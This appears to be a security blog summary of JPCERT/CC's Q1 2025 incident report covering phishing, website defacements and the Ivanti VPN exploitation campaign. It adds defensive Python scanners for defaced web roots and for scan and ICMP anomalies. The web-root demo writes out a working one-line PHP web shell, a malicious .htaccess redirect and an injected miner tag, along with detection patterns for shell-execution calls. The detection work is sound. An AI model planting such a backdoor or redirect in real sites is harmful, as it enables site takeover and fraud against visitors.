As cybercriminals evolve their techniques and tactics, defenders must stay several steps ahead to minimize the risk and damage. The latest Q1 2025 Incident Handling Report from Japan’s JPCERT Coordination Center (JPCERT/CC) provides a front-row seat into the most pressing threats facing Japanese networks this quarter—and the findings should concern organizations far beyond Japan.
Between January and March 2025, JPCERT/CC responded to 3,974 incidents, marking a 10% increase in case coordination compared to the previous quarter. The spike in activity offers a snapshot of attackers’ growing agility and the need for faster, smarter defenses.
Phishing Continues Its Reign
Phishing remains the dominant threat. Out of 6,081 confirmed incidents, a staggering 87%—or 5,267 cases—involved phishing sites.
Notably, there was a 10% increase from the previous quarter, with domestic brands being spoofed far more often than international ones. Over 81% of phishing campaigns mimicked Japanese companies. Credit Saison, Sumitomo Mitsui Card, and JCB were among the most targeted. For foreign brands, Amazon impersonation alone accounted for roughly 60% of phishing incidents. These numbers show that phishing actors are tailoring their lures to match local trust patterns.
An alarming development is the steady use of encrypted messaging apps and cloaked domains, which prolongs the window of effectiveness before takedowns. Although JPCERT/CC was able to notify the parties responsible in 53% of domestic cases, nearly half of the phishing infrastructure was hosted overseas—complicating and delaying response.
Website Defacements Growing in Volume and Sophistication
While fewer in number, website defacements saw a sharp 75% increase, with 95 cases this quarter compared to 53 in the previous one. Attackers used a range of tactics, including:
- Altering .htaccess files to redirect visitors to fake shopping sites
- Injecting PHP backdoors capable of communicating with command-and-control servers
- Embedding JavaScript-based adware and cryptocurrency miners
These intrusions not only degrade brand reputation but may also serve as entry points for follow-on attacks. Some compromised websites even loaded remote malicious code that could execute silently in the background.
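The three tactics listed above leave traces in the web root itself, which makes a file-level integrity sweep a practical first response. The following is an added example written for this summary, not tooling from JPCERT/CC or the report; it builds a constructed web root (file names, hosts and the allow-list are invented for the demo) and flags `.htaccess` redirects to hosts outside the site's own, PHP files carrying typical web-shell constructs, and `<script src>` tags that pull code from off-site origins.

```python
"""Added example (not from the JPCERT/CC report): triage scanner for a web
root that flags the defacement patterns the report describes. The sample
web root, its host names and TRUSTED_HOSTS are constructed for the demo."""
import os
import re
import tempfile
from pathlib import Path

# Hosts this site legitimately references; any other absolute URL is "external".
TRUSTED_HOSTS = {"shop.example.jp", "cdn.example.jp"}

# Apache redirect directives whose target is an absolute URL.
HTACCESS_TARGET = re.compile(
    r"^\s*(?:RewriteRule|Redirect(?:Match)?)\s+.*?(https?://[^\s\"'\]]+)", re.I | re.M)
# <script> tags loading from an absolute URL.
SCRIPT_SRC = re.compile(r"<script[^>]+src=[\"'](https?://[^\"']+)", re.I)
HOST = re.compile(r"https?://([^/:\s\"']+)")

# Constructs characteristic of PHP backdoors; the label is what gets reported.
PHP_BACKDOOR_PATTERNS = [
    ("eval of decoded payload",
     re.compile(r"\beval\s*\(\s*(?:base64_decode|gzinflate|str_rot13|gzuncompress)\s*\(", re.I)),
    ("shell command from request parameter",
     re.compile(r"\b(?:system|exec|shell_exec|passthru|popen)\s*\(\s*\$_(?:GET|POST|REQUEST|COOKIE)\b", re.I)),
    ("dynamic function call from request parameter",
     re.compile(r"\$_(?:GET|POST|REQUEST|COOKIE)\s*\[[^\]]*\]\s*\(", re.I)),
]
PHP_SUFFIXES = {".php", ".phtml"}
MARKUP_SUFFIXES = PHP_SUFFIXES | {".html", ".htm"}


def is_external(url):
    """True when the URL's host is not on the site's allow-list."""
    m = HOST.search(url)
    return bool(m) and m.group(1).lower() not in TRUSTED_HOSTS


def scan_webroot(root):
    """Walk the web root and return a sorted list of (relative_path, reason)."""
    root = Path(root)
    findings = []
    for path in root.rglob("*"):
        if not path.is_file():
            continue
        rel = str(path.relative_to(root)).replace(os.sep, "/")
        text = path.read_text(errors="replace")
        suffix = path.suffix.lower()
        if path.name == ".htaccess":
            for url in HTACCESS_TARGET.findall(text):
                if is_external(url):
                    findings.append((rel, f"redirect to external host: {url}"))
        if suffix in PHP_SUFFIXES:
            for label, pattern in PHP_BACKDOOR_PATTERNS:
                if pattern.search(text):
                    findings.append((rel, f"backdoor pattern: {label}"))
                    break  # one reason per file is enough for triage
        if suffix in MARKUP_SUFFIXES:
            for url in SCRIPT_SRC.findall(text):
                if is_external(url):
                    findings.append((rel, f"external script: {url}"))
    return sorted(findings)


def build_sample_webroot():
    """Create a constructed web root mixing clean and defaced files; return its path."""
    root = Path(tempfile.mkdtemp(prefix="webroot_"))
    # Defacement 1: mobile visitors redirected to a fake shop (host is invented).
    (root / ".htaccess").write_text(
        "RewriteEngine On\n"
        "RewriteCond %{HTTP_USER_AGENT} (Android|iPhone) [NC]\n"
        "RewriteRule ^(.*)$ http://bargain-outlet.invalid/$1 [R=302,L]\n")
    # Defacement 3: a legitimate CDN script next to an injected off-site miner.
    (root / "index.php").write_text(
        "<?php include 'header.php'; ?>\n"
        "<script src=\"https://cdn.example.jp/app.js\"></script>\n"
        "<script src=\"https://miner.invalid/m.js\"></script>\n")
    # Defacement 2: a PHP backdoor hidden under a plausible plugin path.
    (root / "wp-content").mkdir()
    (root / "wp-content" / "cache.php").write_text(
        "<?php @eval(base64_decode($_POST['k'])); ?>\n")
    (root / "about.html").write_text("<html><body>Clean page</body></html>\n")
    return str(root)


if __name__ == "__main__":
    for rel, reason in scan_webroot(build_sample_webroot()):
        print(f"{rel}: {reason}")
```

Run against a real site the allow-list would be the site's own hosts and CDNs, and the output is a worklist for comparison against the deployed release, not proof of compromise on its own.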
Ivanti Connect Secure Vulnerability: A Cautionary Tale
JPCERT/CC also dealt with a targeted exploitation campaign centered around CVE-2025-0282, a critical vulnerability in Ivanti Connect Secure VPN appliances. Several Japanese organizations were found to be compromised after attackers established persistent access through malware known as SPAWNCHIMERA.
This malware suite was designed to evade detection and manipulate Ivanti’s own integrity checker tools. SPAWNCHIMERA combines multiple known malware components (SPAWNSNAIL, SPAWNMOLE, SPAWNANT) to establish footholds and move laterally within victim networks.
Detection was only possible after suspicious ICMP traffic was observed between Ivanti appliances and internal systems—highlighting how stealthy these campaigns can be. The malware also used legitimate system tools to blend in, a tactic common in state-backed espionage groups.
JPCERT/CC issued an advisory urging organizations using Ivanti to check for compromise using updated forensic tools. Those that delayed patching were especially at risk of long-term compromise.
Scans and Malware Sites: Probing for Weak Links
Systematic network scans also increased, with 256 incidents logged—up 10% from the previous quarter. Attackers primarily targeted common ports like Telnet (23/TCP), SSH (22/TCP), and HTTP (80/TCP). These scans are typically the reconnaissance phase for identifying weak points before launching broader attacks.
Meanwhile, malware distribution sites dropped slightly to 23 incidents. Though fewer in number, the risk remains high—especially when these sites are used to distribute loader malware or ransomware payloads in broader campaigns.
Incident Handling Benchmarks
JPCERT/CC managed to notify 96% of parties in website defacement incidents and 78% of those related to malware sites. Notification turnaround times improved, with roughly 30% of phishing notifications completed within three days. Still, nearly half of the phishing infrastructure was deemed unverifiable or already taken down by the time investigators arrived—highlighting the race against time in coordinated response.
Long-Term Trends and Strategic Gaps
The data for fiscal year 2024 shows a continued downward trend in total incident reports (down 30% year-over-year) and coordination cases (down 24%).

However, the surge in phishing and the emergence of sophisticated supply-chain vulnerabilities suggest that attackers are becoming more targeted and efficient rather than less active.
While large-scale ransomware events weren’t explicitly called out this quarter, the underlying trends—supply chain targeting, deep access via VPNs, and credential theft—could easily funnel into ransomware operations in the future.
Lessons for Defenders
- Patch VPNs and edge devices immediately. The Ivanti case reinforces that unpatched infrastructure is a persistent threat vector.
- Monitor for lateral movement. Indicators like unusual ICMP traffic or modified system tools may be the only early signs of compromise.
- Treat phishing as a persistent business risk. Even with anti-spam and awareness campaigns, phishing is evolving. Continuous URL and domain monitoring is essential.
- Improve web security hygiene. Defacements suggest vulnerable CMS setups or poor update practices. Hardening public-facing assets should be standard practice.
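Two of the signals named above, the reconnaissance scans against Telnet, SSH and HTTP in the "Scans and Malware Sites" section and the unusual ICMP traffic between Ivanti appliances and internal systems that exposed the SPAWNCHIMERA intrusions, can both be checked from the same firewall or flow logs. The block below is an added example for this write-up, not code from JPCERT/CC or the report; its log format, the RFC 5737 addresses and the appliance address in `EDGE_APPLIANCES` are all constructed assumptions.

```python
"""Added example (not from the JPCERT/CC report): two detections over
constructed firewall/flow log lines. detect_scanners() flags a source that
probes many distinct hosts on a watched port within a time window;
detect_edge_icmp() flags ICMP between a designated edge appliance and
internal hosts. Log format, addresses and EDGE_APPLIANCES are constructed."""
import re
from collections import defaultdict
from datetime import datetime, timedelta
from ipaddress import ip_address, ip_network

WATCHED_PORTS = {23: "telnet", 22: "ssh", 80: "http"}
# Assumed: internal address of the VPN appliance and the internal range.
EDGE_APPLIANCES = {"192.0.2.254"}
INTERNAL_NET = ip_network("192.0.2.0/24")

LINE = re.compile(
    r"^(?P<ts>\S+)\s+(?P<action>ALLOW|DENY)\s+src=(?P<src>[\d.]+)\s+dst=(?P<dst>[\d.]+)"
    r"\s+proto=(?P<proto>\w+)(?:\s+dport=(?P<dport>\d+))?$")


def parse_line(line):
    """Parse one log line into a dict; return None for lines that do not match."""
    m = LINE.match(line.strip())
    if not m:
        return None
    rec = m.groupdict()
    rec["ts"] = datetime.strptime(rec["ts"], "%Y-%m-%dT%H:%M:%SZ")
    rec["proto"] = rec["proto"].lower()
    rec["dport"] = int(rec["dport"]) if rec["dport"] else None
    return rec


def _records(lines):
    return [r for r in map(parse_line, lines) if r]


def detect_scanners(lines, window=timedelta(minutes=5), min_targets=5):
    """Return {src: {service: distinct_hosts}} for every source that touched at
    least `min_targets` distinct destinations on one watched TCP port inside
    any `window`-long stretch of the log."""
    events = defaultdict(lambda: defaultdict(list))  # src -> port -> [(ts, dst)]
    for r in _records(lines):
        if r["proto"] == "tcp" and r["dport"] in WATCHED_PORTS:
            events[r["src"]][r["dport"]].append((r["ts"], r["dst"]))
    alerts = {}
    for src, by_port in events.items():
        for port, evs in by_port.items():
            evs.sort()
            best, lo = 0, 0
            for hi in range(len(evs)):  # sliding time window over sorted events
                while evs[hi][0] - evs[lo][0] > window:
                    lo += 1
                best = max(best, len({dst for _, dst in evs[lo:hi + 1]}))
            if best >= min_targets:
                alerts.setdefault(src, {})[WATCHED_PORTS[port]] = best
    return alerts


def detect_edge_icmp(lines):
    """Return sorted (timestamp, src, dst) for ICMP flows in either direction
    between an edge appliance and an internal host. External hosts pinging the
    appliance are ordinary internet noise and are deliberately not reported."""
    hits = []
    for r in _records(lines):
        if r["proto"] != "icmp":
            continue
        src, dst = r["src"], r["dst"]
        edge_to_internal = (src in EDGE_APPLIANCES and dst not in EDGE_APPLIANCES
                            and ip_address(dst) in INTERNAL_NET)
        internal_to_edge = (dst in EDGE_APPLIANCES and src not in EDGE_APPLIANCES
                            and ip_address(src) in INTERNAL_NET)
        if edge_to_internal or internal_to_edge:
            hits.append((r["ts"].strftime("%Y-%m-%dT%H:%M:%SZ"), src, dst))
    return sorted(hits)


# Constructed sample log: one external source sweeping Telnet across eight
# hosts in 21 seconds, two HTTP probes, an admin's normal SSH sessions, one
# HTTPS line, ICMP around the appliance, and one unparseable line.
SAMPLE_LOG = [
    f"2025-02-14T03:12:{s:02d}Z DENY src=203.0.113.45 dst=192.0.2.{i} proto=tcp dport=23"
    for i, s in enumerate(range(7, 31, 3), start=1)
] + [
    "2025-02-14T03:13:02Z DENY src=203.0.113.45 dst=192.0.2.20 proto=tcp dport=80",
    "2025-02-14T03:13:05Z DENY src=203.0.113.45 dst=192.0.2.21 proto=tcp dport=80",
    "2025-02-14T03:10:00Z ALLOW src=198.51.100.7 dst=192.0.2.10 proto=tcp dport=22",
    "2025-02-14T03:11:00Z ALLOW src=198.51.100.7 dst=192.0.2.10 proto=tcp dport=22",
    "2025-02-14T03:14:00Z ALLOW src=198.51.100.7 dst=192.0.2.10 proto=tcp dport=22",
    "2025-02-14T03:15:00Z ALLOW src=198.51.100.7 dst=192.0.2.11 proto=tcp dport=443",
    "2025-02-14T04:02:11Z ALLOW src=192.0.2.254 dst=192.0.2.33 proto=icmp",
    "2025-02-14T04:02:12Z ALLOW src=192.0.2.33 dst=192.0.2.254 proto=icmp",
    "2025-02-14T04:05:00Z ALLOW src=192.0.2.40 dst=192.0.2.41 proto=icmp",
    "2025-02-14T04:06:00Z ALLOW src=203.0.113.9 dst=192.0.2.254 proto=icmp",
    "garbage line that does not parse",
]

if __name__ == "__main__":
    print("scanners:", detect_scanners(SAMPLE_LOG))
    print("edge ICMP:", detect_edge_icmp(SAMPLE_LOG))
```

The scan detector counts distinct destinations rather than raw hits, so an administrator repeatedly reaching one server over SSH never trips it, while the ICMP check is deliberately narrow: in most VPN deployments the appliance has no business exchanging ICMP with internal hosts at all, so a handful of matches is a reviewable list rather than an alert storm.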
Final Thoughts
The Q1 2025 JPCERT/CC report makes it clear: cyber threats in Japan—and globally—are becoming more calculated, adaptive, and persistent. Phishing, exploitation of high-profile vulnerabilities, and stealthy malware deployment continue to dominate. Defenders are making strides in faster coordination and response, but global cooperation, especially across jurisdictions, is more crucial than ever.
For enterprises, vigilance must extend from the inbox to the infrastructure layer. For policymakers, the emphasis should remain on real-time collaboration, timely disclosure of vulnerabilities, and capacity building in sectors most at risk. The stakes are high, but with insight-driven defense and a unified response, the tide can be turned.